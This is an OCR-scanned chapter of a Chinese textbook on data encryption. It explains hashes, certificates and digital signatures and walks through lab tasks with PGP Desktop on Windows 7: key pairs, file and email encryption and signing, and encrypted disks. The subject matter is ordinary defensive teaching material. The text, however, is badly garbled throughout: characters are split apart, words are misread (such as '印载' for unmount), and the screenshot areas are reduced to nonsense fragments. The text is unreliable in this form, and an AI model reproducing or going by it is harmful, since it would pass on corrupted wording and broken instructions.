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来 加 密 双 方 间 的 通信 信息 ,通信 完毕 应 立即 销毁 。 常 见 的 散 列 函 数 有 MD5 和 SHA-1。 
MD5 算法 通过 填充 、 附 加 、 初 始 化 累加 器 、 进 行 主 循环 4 步 处 理 得 到 128 位 消息 摘要 。 安 
全 散 列 算法 (SHA-1) 用 于 产生 一 个 160 位 的 消息 摘要 。 


也 25 数字 证 书 技术 


数字 证 书 封装 了 用 户 自 身 的 公 钥 等 信息 ,例如 X. 509 数字 证 书包 含 了 证 书 版 本 ,证 
书 序列 号 .签名 算法 标识 .证 书 有 效 期 .证书 发 行商 名 字 证 书 主体 名 、 证 书 公 钥 信息 和 数 
字 签 名 等 元 素 。 使 用 某 个 数字 证 书 对 数据 进行 加 密 就 是 使 用 该 数字 证 书 中 的 公 钥 对 数据 
进行 加 密 。 

数字 签名 是 笔迹 签名 的 模拟 ,包括 了 消息 认证 函数 ,具有 的 性 质 有 : 必须 能 证 实 作者 
签名 和 签名 的 日 期 和 事件 \ 在 签名 时 必须 能 对 内 容 进行 鉴别 ,签名 必须 能 被 第 三 方 证 实 以 
解决 争端 。 基 于 公 钥 密码 体制 和 基于 私 钥 密 码 体制 都 可 以 获得 数字 签名 ,目前 主要 是 基 
于 公 钥 密码 体制 的 数字 签名 。 利 用 公 钥 密码 体制 ,数字 签名 是 一 个 加 密 的 消息 摘要 ,附加 
在 消息 的 后 面 。 基 于 公 钥 密码 体制 的 数字 签名 是 指 以 用 户 的 私 钥 作 为 加 密 密 钥 ,以 公 钥 
作为 解密 密 钥 ,从 而 实现 由 一 个 用 户 加 密 的 消息 能 够 被 多 个 用 户 解 读 , 且 发 送 方 无 法 否认 
自己 所 发 送 的 信息 。 

广泛 使 用 的 安全 电子 邮件 技术 包括 PGP 和 S/MIME( 安 全 /通用 Internet 邮件 扩 
充 )。 摘 要 函数 是 安全 电子 邮件 实现 技术 之 一 。 一 个 好 的 摘要 函数 具有 如 下 特点 : 根据 
输入 报 文 获取 其 输出 摘要 的 时 间 非 常 短 ; 根据 输入 数据 无 法 还 原 出 输入 数据 ; 不 同 长 度 
的 输入 报 文 计算 出 的 摘要 长 度 相 同 。 





12.3 方案 设计 


方案 设计 如 表 12-3 所 示 。 
表 12-3 方案 设计 
任务 名 称 | 数据 加 密 技术 的 使 用 


1. 在 Windows 7 上 安装 PGP 系统 
(1) 软件 安装 

(2) 密 钥 对 的 生成 和 查看 

(3) 软件 汉化 

(4) 导出 并 发 布 自己 的 公 钥 

(5) 导入 并 设置 其 他 人 的 公 钥 

2. 使 用 PGP 系统 加 密 数据 文件 
(1) 加 密 和 解密 

(2) 签名 和 验证 

(3) 加 密 、 签 名 和 解密 、 校 验 





任务 分 解 














续 表 





任务 分 解 


3. 使 用 PGP 系统 加 密 邮 件 

(1) 加 密 和 签名 

(2) 解密 和 验证 签名 

4. 使 用 PGP 系统 加 密 本 地 硬盘 
(1) 创建 加 密 磁盘 

(2) 加 载 加 密 磁盘 

(3) 印 载 加 密 磁盘 





能 力 目标 


1. 能 安装 PGP 系统 

2. 能 生成 和 查看 公 钥 和 私 钥 

3. 能 重新 创建 密 钥 对 

4. 能 导出 并 发 布 自己 的 公 钥 

5. 能 导入 其 他 人 的 公 钥 ,并 设置 公 钥 属 性 来 获得 信任 关系 

6. 能 使 用 PGP 系统 加 密 和 解密 文件 

7. 能 对 文件 进行 签名 和 签名 验证 

8. 能 使 用 PGP 系统 加 密 和 签名 邮件 

9. 能 使 用 PGP 系统 解密 和 验证 签名 邮件 

10. 能 使 用 PGP 系统 创建 加 密 磁 盘 加载 加 密 磁盘 和 印 载 加 密 磁盘 





知识 目标 


1. 掌握 密码 学 的 有 关 概 念 

2. 了 解 常见 的 古典 密码 加 密 技 术 

3. 理解 对 称 加 密 算 法 和 非 对 称 加 密 算 法 的 基本 思想 以 及 两 者 的 区 别 

4. 了 解 对 称 密 钥 加 密 技术 的 典型 算法 DES、3DES、IDEA 和 AES 

5. 熟悉 对 称 加 密 算法 的 特点 和 优 缺 点 

6. 了 解 非 对 称 加 密 技 术 的 典型 算法 RSA 

7. 熟悉 非 对 称 加 密 算法 的 特点 和 优 缺 点 

8. 了 解 非 对 称 加 密 算法 攻击 软件 PGP 加 密 系 统 的 工作 原理 、 密 钥 的 生产 和 管理 方法 
以 及 各 种 典型 的 应 用 

9. 理解 PGP 加 密 系 统 中 密 钥 信任 关系 的 传递 特性 

10. 了 解 非 对 称 密 钥 算法 和 对 称 密 钥 算法 的 混合 算法 EFS 的 工作 原理 

11. 熟悉 EFS 加 密 文件 系统 的 使 用 方法 





素质 目标 





. 树立 较 强 的 安全 意识 

. 掌握 网 络 安全 行业 的 基本 情况 

. 培养 良好 的 职业 道德 

. 培养 职业 兴趣 ,能 爱 岗 敬 业 、 热 情 主动 的 工作 态度 
. 具有 可 持续 发 展 能 力 


an 证 





12.4 项 目 实 施 


亿 41 任务 1: 在 Wndons 7 上 安装 PGP 系 统 


1. 任务 目标 


安装 PGP 系统 。 
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2. 工作 任务 


(1) 软件 安装 。 

(2) 密 钥 对 的 生成 和 查看 。 

(3) 软件 汉化 。 

(4) 导出 并 发 布 自己 的 公 钥 。 
(5) 导入 并 设置 其 他 人 的 公 钥 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 
(2) 软件 工具 : PGP 加 密 软 件 。 


4. 实施 过 程 


(1) 软件 安装 。 

软件 的 安装 很 简单 ,具体 操作 步骤 如 下 。 

QO@ 双击 安装 程序 ,进入 安装 界面 ,选择 安装 语言 ,默认 为 English, 单 击 OK 按钮 ,如 
图 12-1 所 示 。 

@ 在 弹出 的 许可 协议 窗口 中 .阅读 后 选择 I accept the license agreement 单 选 按钮 ， 
如 图 12-2 所 示 。 单 击 Next 按钮 ,弹出 是 否 跳 转 到 Release Notes 页 面 ,默认 选择 Do not 
display the Release Notes, 不 跳 转 ,然后 继续 单 击 Next 按钮 ,开始 安装 。 


do not accept the terms of this agreement and you must not install the 
Software ] 








图 12-1 选择 语言 图 12-2 阅读 并 接受 协议 


图 弹出 安装 提示 You must restart your system, 如 图 12-3 所 示 , 单 击 Yes 按钮 , 重 
启 计算 机 。 

@ 重新 启动 系统 后 ,会 出 现 PGP Setup Assistant 对 话 框 ,默认 选择 Yes, 然 后 单 击 
“下 一 步 ? 按 钮 ,出现 注册 窗口 。 输 入 注册 信息 后 , 单 击 “ 下 一 步 ?按钮 ,如 图 12-4 所 示 。 






































DE 项 目 12 数据 加 密 技术 的 使 用 < 


You must restart you system for the configuration changes made 
to PGP Desktop to take elfect Cick Yes to restart now or No 
‘you plan to restatt manually laler 





Ew ml| 


图 12-3 暂 不 重启 计算 机 


Licensing Assistant: Enable Licensed Functionality 


人 PGP Desktop wil be inked to 
name, organization, and email address entered here, If you have 
te your hoense Mumber, make sure to enter the same | before, 
Enable User 
Licensing 
New User 
Key Generation 
Global Directory 





Messaging 


Additional Features 
Name [Te Ac 
Orosriston [ViL cors 





ED 
图 12-4 输入 用 户 注 册 信 息 





@ 在 弹出 对 话 框 中 输入 软件 的 序列 号 进行 认证 , 单 击 “ 下 一 步 ” 按 钮 。 弹 出 注册 成 功 
对 话 框 ,所 有 的 产品 均 被 勾 选 中 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 12-5 所 示 。 


(2) 密 钥 对 的 生成 和 查看 。 

OO 弹出 User Type( 用 户 类 型 ) 对 话 框 ,选择 I am a new user( 我 是 一 个 新 用 户 ) , 单 击 
“下 一 步 ” 按 钮 。 

@ 弹出 PGP KEY Generation Assistant(PGP 密 钥 对 生成 向 导 ) 对 话 框 , 单 击 “下 一 
步 ”按钮 。 

@ 弹出 账户 和 邮箱 设置 对 话 框 ,输入 密 钥 账号 名 称 和 邮箱 地 址 ,最 好 不 使 用 默认 的 


Administra 


tor, 单 击 “ 下 一 步 ” 按 钮 ,如 图 12-6 所 示 。 注 意 ,如 果实 验 中 需要 安装 两 个 PGP 


系统 则 两 个 账户 名 和 密码 需要 有 区 别 。 





@ 弹 H 


上 的 对 话 框 要 求 输入 用 于 保护 私 钥 的 密码 ,此 密码 长 度 建议 8 位 以 上 ,并 要 求 


确认 , 即 再 次 重复 一 遍 。 在 Enter Passphrase 处 输入 需要 的 密码 ,在 Re-enter Passphrase 
处 重复 一 遍 刚 才 输入 的 密码 。 若 对 话 框 右上 角 的 Show Keystrokes 被 选中 , 则 输入 的 密 
码 会 显示 出 来 ,下 面 的 百分比 表示 密码 的 质量 . 越 高 安全 性 越 好 .如 图 12-7 所 示 。 
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Licensing， 
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Mouse over an icon to learn about eadh feature of PGP Desktop 
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12-5 选择 组 件 


PGP Setup Assistant 
Name and Email Assignment 


Every key pair must have a name associated wth it. The name and email address let 
Your correspondents know that the public key they are using belongs to you, 


Enable User 
Licensing Fase [el 
pray Em [nieles cm More > 





Kk A 
Globah Directory 
Messaging| 
Additional Featureg 











《上 - 步 o)[ 下 - 步 mm 取消 | 二 | 





12-6 个 人 信息 填写 


(3) 软件 汉化 。 

QO@ 关闭 PGP 软件 。 

@ 把 PGP 中 文 语 言 包 解压 ,把 28 个 解压 文件 复制 到 C:\Program Files (x86)\ 
Common Files\PGP Corporation\Strings 目录 下 。 

@ 执行 “开始 ”一 “所 有 程序 ”PGP 一 PGP Desktop 命令 打开 PGP 主 界面 ,选择 
Tools->Options 命令 ,选择 General 选项 卡 .在 最 下 方 Product Language 下 拉 列 表 框 中 选 
择 Deutsch, 单 击 “ 确 定 ”按钮 ,弹出 警告 窗口 ,继续 单 击 “ 确 定 ” 按 钮 。 



































| 项 目 12 数据 加 密 技术 的 使 用 下 < 


Your private key wil be protected by a passphrase. Itis mportant to keep your 
passphrase seaet and do not write t down. 





Your passphrase should be at least 8 characters long and should contain 
non-alphabetic characters. 








Enter Passphrase: Show Keystrokes F 
dp tguol 
ba Directory 
Messaging a 
Addftional Features Pe 
Fapteuol 











《上 -- 步 呈 取消 部 助 


12-7 输入 保护 公 钥 和 私 钥 的 密码 





@ 关闭 PGP 软件 ,重新 打开 ,发 现 PGP 已 经 被 汉化 。 

(4) 导出 并 发 布 自己 的 公 钥 。 通 过 PGP 程序 窗口 中 的 “文件 ”一 “导出 ”命令 可 以 导 
出 当前 选中 的 密 钥 对 中 的 公 钥 。 需 要 注意 的 是 ,一 个 用 户 对 应 的 密 钥 以 “ 密 钥 对 ”的 形式 
存在 ,其 中 包含 了 一 个 公 钥 和 一 个 私 钥 。 公 和 钥 可 以 分 发 给 任何 人 ,其 他 人 可 以 用 此 密 钥 对 
要 发 给 此 密 钥 拥有 者 的 文件 或 邮件 进行 加 密 。 私 钥 只 有 此 密 钥 的 拥有 者 一 人 所 有 ,不 可 
公开 分 发 ,此 密 钥 用 来 解密 所 有 用 此 密 钥 拥有 者 的 公 钥 加 密 的 文件 或 邮件 。 因 此 ,如 果 在 
导出 到 文件 的 窗口 下 面 选中 Include Pravate Key 则 导出 了 公 钥 和 私 钥 ,一般 情 况 下 ,不 
需要 导出 私 钥 。 

导出 公 钥 的 具体 操作 步骤 如 下 。 

QO 回击 窗口 中 的 密 钥 对 ,在 弹出 的 快捷 菜单 中 选择 “导出 ”命令 。 

@ 在 弹出 的 “导出 密 钥 到 文件 ”对话 框 中 .选择 一 个 目录 作为 导出 公 钥 存放 的 目录 ， 
单 击 “ 保 存 ” 按 钮 ,如 图 12-8 所 示 。 

公 钥 文件 的 扩展 名 是 . asc。 导 出 公 钥 后 就 可 以 将 此 公 钥 发 布 出 去 ,发 给 通信 的 对 方 。 
当 有 重要 的 文件 或 邮件 时 ,对 方 通过 PGP 使 用 此 公 钥 进行 加 密 后 发 回来 .这 样 能 防止 隐 
私 或 商业 机 密 被 窃取 ,即便 被 截获 也 很 难 解密 。 

(5) 导入 并 设置 其 他 人 的 公 钥 。 导 入 公 钥 的 方法 如 下 。 

QO@ 直接 双击 对 方 发 来 的 扩展 名 为 . asc 的 公 钥 ,出 现 选择 公 钥 的 窗口 ,在 此 能 看 到 该 
公 钥 的 基本 信息 ,包括 有 效 性 、 创 建 时 间 信 任 度 等 ,便于 了 解 是 否 应 该 导入 此 公 引 

@ 选 好 后 , 单 击 Import( 导 入 ) 按 钮 , 即 可 把 公 钥 导入 到 PGP 中 。 

导入 其 他 人 的 公 钥 后 ,“ 已 校 验 ”处 显示 为 灰色 .这 表示 新 导入 的 公 钥 还 没有 得 到 用 户 
的 认可 。 如 果 确 信 这 个 公 钥 是 正确 的 . 即 没 有 被 第 三 方 伪 装 或 算 改 ,可 以 通过 设置 公 钥 的 
属性 来 使 之 获得 信任 关系 。 








| | EE 





文件 名 0m: [eT 
各 存 类 型 中 [scII 定 钥 文 件 @ ssc) | 


厂 包含 私 外) 





1 个 密 角 已 选择 


图 12-8 导出 公 钥 





设置 公 钥 属性 的 方法 如 下 。 

@ 打开 PGPkeys, 在 密 钥 列表 中 看 到 刚刚 导入 的 密 钥 。 选 择 后 右 击 , 选 择 “ 密 钥 属 
性 "命令 ,这 里 能 看 到 该 密 钥 的 全 部 信息 。 

@ 单 击 “ 信 任 度 ” 后 面 的 小 三 角 , 选择 “可 信和 ”命令 ,但 “已 校 验 ” 仍 然 为 * 否 ”如 
图 12-9 所 示 。 














图 12-9 公 钥 的 信任 度 设置 


@ 关闭 此 对 话 框 ,然后 右 击 该 密 钥 ,选择 “签名 ”命令 ,打开 “PGP 签名 密 钥 ”对 话 框 ， 
如 图 12-10 所 示 。 

@ 单 击 “ 确 定 ” 按 钮 ,弹出 *PGP 为 选择 密 钥 输 入 密码 "对话 框 。 选 择 要 签名 的 公 钥 ， 
然后 单 击 “ 确 定 ” 按 钮 。 注 意 ,如 果 当 前 选择 密 钥 的 密码 已 经 被 缓存 , 则 不 需要 输入 密码 ， 
如 图 12-11 所 示 。 

@ 车 密码 没有 被 缓存 , 则 需要 输入 密码 , 单 击 “ 确 定 ” 按 钮 ,如 图 12-12 所 示 。 

@ 此 时 ,在 PGP Keys 对 话 框 中 ,该 公 钥 变 成 “有 效 的 ”, 即 在 “已 校 验 ” 栏 出 现 绿色 标 








P6P 签 名 宝 钥 


| 
me <mecal63 com> DAA3 PCD9 DOAA ABAA 1D18 B6134 TB2A 12E1 6BC1 








图 12-10 “PGP 签名 密 钥 ” 对 话 框 





图 12-11 对 新 导入 的 公 钥 进行 签名 








PGP 为 达 择 密 钼 输入 密 和 


P| 
[CE _ane | 


图 12-12 输入 签名 密 钥 的 密码 


志 , 但 公 钥 zmc 呈现 “斜体 ”效果 ,如 图 12-13 所 示 。 
@ 右 击 公 钥 zmc, 选择 “启用 ”命令 , 公 钥 zmc 立刻 “直立 ”了 起 来 , 公 钥 导入 操作 


完成 。 
也 42 任务 2: 使 用 PSP 系统 加 密 数据 文件 


1. 任务 目标 


使 用 PGP 对 数据 文件 进行 加 密 、 签 名 的 操作 原理 是 选择 对 方 的 公 钥 进行 加 密 而 使 用 
自己 的 私 钥 进 行 签名 ,对 方 收 到 后 使 用 自己 的 私 钥 进 行 解密 ,而 使 用 对 方 的 公 钥 进 行 签 名 








MM PGP Desktop — All Keys 


文件 F) 编辑 史 ) 查看 多 


P6P 害 钼 


RR Al Keys 
要 





图 12-13 签名 后 的 公 钥 状态 
2. 工作 任务 


(1) 加 密 和 解密 。 
(2) 签名 和 验证 。 
(3) 加 密 、 签 名 和 解密 、 校 验 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 。 
(2) 软件 工具 : PGP 加 密 软件 


4. 实施 过 程 


(1) 加 密 和 解密 。 假 定 计算 机 A 的 密 钥 对 是 guol, 计 算 机 B 的 密 钥 对 是 zmc, 已 经 互 
相 导 入 公 钥 ,并 设置 为 可 信 状 态 。 现 在 在 计算 机 A 上 使 用 zmc 的 公 钥 对 文件 1. txt 进行 
加 密 , 然 后 把 加 密 后 的 密 文 传输 到 计算 机 B, 由 计算 机 B 的 zmc 私 钥 进行 文件 解密 。 

使 用 PGP 对 文件 加 密 .解密 的 过 程 非常 简单 ,具体 操作 步骤 如 下 。 

Qa 在 计算 机 A 上 右 击 需要 加 密 的 数据 文件 1. txt, 然 后 选择 快捷 菜单 中 的 PGP 
Desktop 习 “使 用 密 钥 保护 1. txt” 命 令 。 

@ 在 弹出 的 “PGP 压缩 包 助 手 ? 对 话 框 中 ,看 到 列表 之 中 只 有 guol 密 钥 。 选 中 guol 
密 钥 , 单 击 “ 移 除 ? 按 钮 。 再 单 击 “添加 ?按钮 ,弹出 * 收 件 人 选择 ?对 话 框 , 选 择 zmc, 然 后 单 
击 “ 添 加 ”按钮 ,把 zmec 公 钥 添加 到 右 侧 窗口 中 ,如 图 12-14 所 示 。 单 击 “ 确 定 ”按钮 。 

@ 返回 “PGP 压缩 包 助 手 " 对 话 框 ,看 到 列表 中 只 有 zmc 密 钥 ,如 图 12-15 所 示 。 

@ 弹出 “签名 并 保存 ”对 话 框 ,如 果 只 是 加 密 而 不 签名 的 话 , 在 “签名 密 钥 "下拉 列表 
中 选择 “无 选项 ,加 密 后 的 密 文 默认 保存 在 桌面 上 ,如 果 想 更 改 存放 的 地 方 可 以 单 击 “ 浏 
览 ? 按 钮 ,然后 单 击 “下 一 步 " 按 钮 。 

@ 桌面 上 产生 一 个 扩展 名 为 . pgp 的 文件 加 密 文件 。 

@ 对 方 收 到 加 密 后 扩展 名 为 . pgp 的 文件 后 ,双击 该 文件 ,或 右 击 该 文件 并 选择 快捷 
菜单 中 的 “解密 & 校 验 (D)1. txt. pgp” 命 令 , 在 对 话 框 中 输入 密码 即 可 ,即使 用 私 钥 解密 。 
如 果 密 钥 已 被 缓存 , 则 不 必 输 入 密码 即 可 得 到 解密 后 的 明文 1. txt。 
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图 12-14 选择 密 钥 
添加 用 户 密 钥 
为 和 起 要 加 密 的 收 件 人 辆 入 用 户 歼 钥 。 
为 -个 密 钥 输入 用 户 名 或 邮件 地 址 
-| 添加- 
1 com> 避 

















《< 上 一步 @) | 下 一 步 0) >| 取消 帮助 
图 12-15 ”选择 加 密 的 公 钥 


(2) 签名 和 验证 。 假 定 计算 机 A 的 密 钥 对 是 guol, 计 算 机 B 的 密 钥 对 是 zmc, 已 经 
相 导 入 公 钥 ,并 设置 为 可 信 状 态 。 现 在 在 计算 机 A 上 使 用 guol 的 私 钥 对 文件 2. txt 进行 
签名 ,然后 把 签名 后 的 文 传输 到 计算 机 B, 由 计算 机 B 的 guol 公 钥 进行 签名 验证 。 

QO 布 击 需 要 签名 的 文件 2. txt, 选 择 PGP Desktop 一 “签名 为 "命令 。 弹 出 “签名 并 保 
存 ” 对 话 框 ,输入 私 钥 guol 的 密码 sdptguol, 选 择 “ 显 示 键 人 ” 复 选 框 ,能 看 到 输入 的 私 钥 
密码 ,清除 “保存 分 离 的 签名 ” 复 选 框 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 12-16 所 示 。 
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「 签名 密 钥 
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厂 保存 位 置 
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< 上-*o)[F-*m mi | ww | 
12-16 签名 并 保存 


@ 把 生成 的 2. txt. pgp 文件 传送 给 计算 机 B, 在 计算 机 B 双击 2. txt. pgp 签名 文件 ， 
弹出 “已 校 验 ” 提 示 框 ,如 图 12-17 所 示 。 


‘s\Adninistrator\Desktop 


PGP 压缩 包 大 小 330 字 节 


状态 已 校 验 
guol 《guol8163. com》 0x69540FC5， 有 效 密 钥 








图 12-17 校 验 成 功 


@ 如 果 文 件 在 传送 过 程 中 被 第 三 方 伪装 或 自 改 ,签名 验证 将 不 成 功 , 且 显 示 出 错 。 

(3) 加 密 、 签 名 和 解密 、 校 验 。 假 定 计算 机 A 的 密 钥 对 是 guol, 计 算 机 B 的 密 钥 对 是 
zmc, 已 经 互相 导入 公 钥 ,并 设置 为 可 信 状 态 。 现 在 在 计算 机 A 上 使 用 zmc 的 公 钥 对 文件 
3. txt 进行 加 密 ,使 用 guol 的 私 钥 对 文件 3. txt 进行 签名 ,然后 把 加 密 、 签 名 后 的 文件 传 
送 到 计算 机 B, 由 计算 机 B 的 guol 公 钥 进行 签名 验证 ,用 zme 的 私 钥 进行 解密 。 

Q@ 在 计算 机 A 上 右键 需要 加 密 的 数据 文件 3. txt, 然 后 选择 快捷 菜单 中 PGP 
Desktop 一 “使 用 密 钥 保护 3. txt” 命 令 。 
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@ 在 弹出 的 “PGP 压缩 包 助 手 ? 对 话 框 中 ,看 到 列表 中 只 有 guol 密 钥 。 选 择 guol 密 
钥 , 单 击 “ 移 除 ”按钮 ,再 单 击 “ 添 加 ”按钮 ,弹出 “ 收 件 人 选择 ”对 话 框 ,选择 zme 命令 ,然后 
单 击 “ 添 加 ”按钮 ,把 zmc 公 钥 添加 到 右 侧 窗口 中 ,然后 单 击 “ 确 定 ” 按 钮 。 

@ 返回 “PGP 压缩 包 助 手 ? 对 话 框 , 看 到 列表 中 只 有 zmc 密 钥 。 

@ 弹出 “签名 并 保存 ”对 话 框 ,在 “签名 密 钥 "下拉 列表 中 选择 guol, 如 果 密 钥 口 令 已 
缓存 , 则 不 需要 输入 ,如 果 未 缓存 则 需要 输入 guol 的 私 钥 密 码 ,加密 后 的 密 文 默认 保存 在 
桌面 上 ,如果 想 更 改 存放 的 地 方 可 以 单 击 “ 浏 览 ” 按 钮 ,然后 单 击 “ 下 一 步 ” 按 钮 ,如 
图 12-18 所 示 。 
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-上 o[F-2o 请 | ww | 
图 12-18 “签名 并 保存 ”对话 框 


@ 桌面 上 产生 一 个 扩展 名 为 . pgp 的 文件 加 密 文 件 3. txt. pgp, 把 该 文件 传输 到 计算 
机 B。 对 方 收 到 加 密 后 扩展 名 为 . pgp 的 文件 后 ,双击 该 文件 ,或 右 击 该 文件 并 选择 快捷 
菜单 中 的 “解密 & 校 验 (D)3. txt. pgp” 命 令 , 在 对 话 框 中 输入 密码 即 可 ,即使 用 私 钥 解 密 。 
如 果 密 钥 已 被 缓存 , 则 不 必 输 入 密码 即 可 得 到 解密 后 的 明文 3. txt。 

@ 计算 机 B 的 桌面 上 生成 解密 成 功 的 3. txt, 弹 出 *PGP Desktop- 验 证 历史 ”对 话 框 ， 
确认 3. txt. pgp 的 确 由 guol 签名 ,如 图 12-19 所 示 。 


也 43 任务 3: 使 用 PGP 系 统 加 密 邮件 





1. 任务 目标 


使 用 PGP 对 邮件 内 容 进 行 加 密 、 签 名 的 操作 原理 和 对 文件 的 加 密 、 签 名 是 一 样 的 ,都 
是 选择 对 方 的 公 钥 进行 加 密 而 使 用 自己 的 私 钥 进行 签名 ,对 方 收 到 后 使 用 自己 的 私 钥 进 
行 解密 ,而 使 用 对 方 的 公 钥 进行 签名 验证 。 
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图 12-19 查看 验证 历史 


2. 工作 任务 


(1) 加 密 和 签名 。 
(2) 解密 和 验证 签名 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 。 
(2) 软件 工具 : PGP 加 密 软 件 。 


4. 实施 过 程 


(1) 加 密 和 签名 。 

J@ 将 需要 加 密 、 签 名 的 邮件 内 容 复 制 到 剪贴 板 上 ,然后 单 击 操作 系统 桌面 右 下 角 系 
统 托盘 中 的 PGP 图 标 ,选择 “剪贴 板 ”* 加 密 & 签名 ”命令 。 

@ 在 弹出 的 “ 密 钥 选择 对话 框 中 选择 对 方 的 密 钥 ,双击 收 件 人 列表 中 的 guol 使 其 
加 到 上 方 列 表 中 ,双击 上 方 列表 中 的 zmc 使 其 添加 到 下 方 “ 收 件 人 ” 框 中 ,即使 用 zmec 的 
公 钥 加 密 , 然 后 单 击 “ 确 定 ” 按 钮 ,如 图 12-20 所 示 。 

@ 在 弹出 的 “输入 密码 ”对 话 框 中 输入 guol 私 钥 的 密码 ,进行 签名 , 勾 选 “显示 键入 ” 
可 以 显示 输入 的 密码 ,如 图 12-21 所 示 。 

@ PGP 会 将 加 密 和 签名 的 结果 自动 更 新 到 剪贴 板 中 。 

@ 回 到 邮件 编辑 状态 ,只 须 将 剪贴 板 的 内 容 粘贴 到 5. txt, 就 会 得 到 加 密 和 签名 后 的 
邮件 ,如 图 12-22 所 示 。 

(2) 解密 和 验证 签名 。 

@ 对 方 收 到 加 密 和 签名 后 的 邮件 后 , 先 将 邮件 内 容 5. txt 中 的 内 容 复 制 到 剪贴 板 中 ， 
然后 单 击 操作 系统 桌面 右 下 角 系 统 托盘 中 的 PGP 图 标 . 选 择 “* 剪 贴 板 ”~ 解密 && 校 验 ” 
菜单 项 ,弹出 输入 zmc 私 钥 密码 的 提示 框 , 如 图 12-23 所 示 。 

@ 输入 私 钥 密码 进行 解密 和 导入 公 钥 验证 签名 完成 后 ,PGP 会 自动 出 现 “ 文 本 阅读 
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图 12-20 剪贴 板 的 加 密 签 名 操作 
PoP Desktop ~ 输 和 [a 


py 


Co | mo | 





图 12-21 使 用 私 钥 的 密码 加 密 


一 一 -BEGIN PGP MESSAGE--———— 
i 1 (Build 10) 


aANQR1DBwEwDVYWRg all FUkQBCADQVN2cVNOGxZTz1 Yk tNH/7s9XAZeJ/ByviloE 
SLPwAUTyt eVO2PYKz2rymx2KL6E31vicHhC jz31HnNdVF WtG3KccLUnikewR2hAXIN 
Ypdk SANeykluo53XibpH+ 3+QumdvOH?+eBJTAuSMz31g/Zg3SaqEsowxAF tFLDOt 
9ed4VePC1b+/uiHtmXZ4n06mPsQgwEd40stIKU/1X8tEtiy9jKAkIF7hP9sG2/1Nlr 

7FnB4/Lr3nZUnEc3rkxHjlkm/Y3LYDiTURJN 








图 12-22 加密 和 签名 后 的 邮件 内 容 


器 ”窗口 显示 结果 ,如 图 12-24 所 示 。 
@ 通过 “复制 到 剪贴 板 ?按钮 将 结果 复制 到 剪贴 板 中 然后 再 粘贴 到 需要 的 地 方 。 








可 < [由 G 安 人 g 畦 ( 和 2) | 


PGP Desktop - 输入 密码 四 


[ene <mcel163 com> (RSA/2048) 


学 好 《网 络 安全 部 署 》 课程 的 关键 是 勤学 苦 练 ! 
Ar END POP DECRYPTED/VERIFIED NESSAGE ##* 一 





图 12-24 解密 后 的 文本 内 容 


忆 244 任务 4: 使 用 PGP 系统 加 密 本 地 硬盘 
1. 任务 目标 


PGP 加 密 系统 不 仅 可 以 对 文件 .邮件 加 密 , 还 可 以 对 磁盘 加 密 , 将 需要 保密 的 数据 放 
在 PGP 加 密 磁盘 中 。 即 使 数据 硬盘 被 偷 走 , 对 PGP 加 密 磁盘 文件 的 解密 也 存在 很 大 的 
难度 ,从 而 保证 了 数据 的 机 密 性 。 下 面 介 绍 使 用 PGP 系统 加 密 本 地 硬盘 的 方法 。 


2. 工作 任务 


(1) 创建 加 密 磁盘 。 
(2) 加 载 加 密 磁盘 。 
(3) 印 载 加 密 磁盘 。 


3. 工作 环境 


(1) 一 台 预 装 Windows 7 系统 的 主机 。 
(2) 软件 工具 : PGP 加 密 软 件 


4. 实施 过 程 
(1) 创建 加 密 磁盘 。 
@ 选择 “开始 ”>“ 所 有 程序 ”PGP Desktop, 打 开 PGP 主 界面 , 单 击 左 侧 的 “PGP 





号 
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磁盘 ”, 再 单 击 右 侧 的 “创建 ”按钮 ,启动 PGP 加 密 磁盘 创建 向 导 , 如 图 12-25 所 示 。 


于 pp 所 建 虚拟 碰 盘 


输入 磁盘 属性 
名 称 
瑞生 文件 位 轩 | i | 
关 载 于 S| 
恤 启 :装载 
器 id 间 不 笑 ahbdjp 载 时时 分 


| 
es 025s | 


用 户 访问 


为 一 个 定 钥 输入 用 户 名 或 邮件 地 址 


-x 隐 除 用 户 … 





图 12-25 ”使 用 PGP 构建 加 密 磁盘 


@ 确定 加 密 磁盘 生成 的 路 径 和 名 称 以 及 加 密 磁盘 的 大 小 。 
@ 选择 加 密 磁盘 的 方法 ,使 用 公 钥 或 者 密码 加 密 , 这 里 选择 密码 加 密 。 


@ 最 后 单 击 “ 创 建 " 按 钮 ,弹出 “为 密 钥 输入 密码 ”对 话 框 ,输入 密码 单 击 “ 确 定 ” 按 钮 ， 


完成 磁盘 的 创建 。 
(2) 加 载 加 密 磁盘 。 


@ 创建 好 加 密 磁盘 后 ,可 以 在 “我 的 电脑 "中 看 到 加 密 磁盘 “新 建 PGP 磁盘 1(E:)”， 


如 图 12-26 所 示 。 
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图 12-26 生成 的 加 密 磁盘 





| < (mg) 


@ 如 果 加 密 的 磁盘 被 卸载 了 ,看 不 到 了 ,可 打开 PGP 主 界面 , 单 击 左 侧 的 “PGP 磁 
盘 ”, 再 单 击 右 侧 的 “装载 "按钮 加 载 磁盘 。 
@ 加 载 时 需要 输入 私 钥 的 密码 ,如 图 12-27 所 示 。 





12-27 输入 私 钥 的 密码 


@ 直接 双击 加 密 磁盘 ,打开 加 密 磁盘 ,以 后 用 户 就 可 以 把 需要 保密 的 数据 放 在 该 此 
磁盘 中 ,操作 方法 与 普通 磁盘 的 操作 一 样 。 

(3) 印 载 加 密 磁 盘 。 如 果 暂 时 不 需要 对 加 密 磁 盘 中 的 数据 进行 操作 ,可 以 对 加 密 磁 
盘 进行 印 载 操作 。 具 体 步 又 如 下 。 

@ 打开 PGP 主 界面 , 单 击 左 侧 的 “PGP 磁盘 ”, 再 单 击 右 侧 的 “ 印 载 "按钮 。 

@ 默认 情况 下 ,如果 超 过 1 分 钟 没有 对 加 密 磁盘 进行 操作 ,PGP 系统 将 自动 将 加 密 
磁盘 进行 卸载 。 


12.5 常见 问题 解答 


1. PGP 系统 会 自动 记录 密 钥 的 私 钥 密 码 ,这 给 PGP 带 来 了 很 大 的 安全 隐患 ,该 如 何 
处 理 ? 

答 : 可 以 通过 设置 “清除 缓存 ”的 方法 删除 口令 缓存 ,提高 系统 的 安全 性 。 单 击 操作 
系统 桌面 右 下 角 系 统 托盘 中 的 PGP 图 标 ,在 弹出 的 菜单 中 选择 “清除 缓存 ”命令 ,如 
图 12-28 所 示 。 


”Desktop 





